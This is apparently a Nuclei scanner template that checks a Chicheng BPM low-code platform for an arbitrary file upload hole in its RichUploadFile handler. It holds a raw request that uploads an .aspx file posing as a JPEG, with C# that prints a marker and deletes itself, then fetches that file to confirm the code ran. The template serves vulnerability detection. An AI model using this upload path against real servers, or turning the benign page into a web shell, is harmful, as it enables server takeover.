id: chichengBPM-RichUploadFile-File-upload

info:
  name: 驰骋BPM低代码开发平台 RichUploadFile 任意文件上传漏洞
  author: chichengBPM
  severity: high
  tags: File upload

variables:
  username: "{{to_lower(rand_base(6))}}" #从可选字符集（默认为字母和数字）生成给定长度字符串的随机序列

http:
  - raw:
      - |
        POST /WF/Comm/Handler.ashx?DoType=HttpHandler&DoMethod=RichUploadFile&HttpHandlerName=BP.WF.HttpHandler.WF_Comm_Sys&Directory=Mazi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj

        ------WebKitFormBoundaryFfJZ4PlAZBixjELj
        Content-Disposition: form-data; name="edit"; filename="{{username}}.aspx"
        Content-Type: image/jpeg

        <%@Page Language="C#"%><%Response.Write("sectestsectest");System.IO.File.Delete(Request.PhysicalPath);%>
        ------WebKitFormBoundaryFfJZ4PlAZBixjELj--
  - raw:
      - |
        GET /DataUser/RichTextFile/Mazi/{{username}}.aspx HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'sectestsectest'
      - type: status
        status: 
          - 200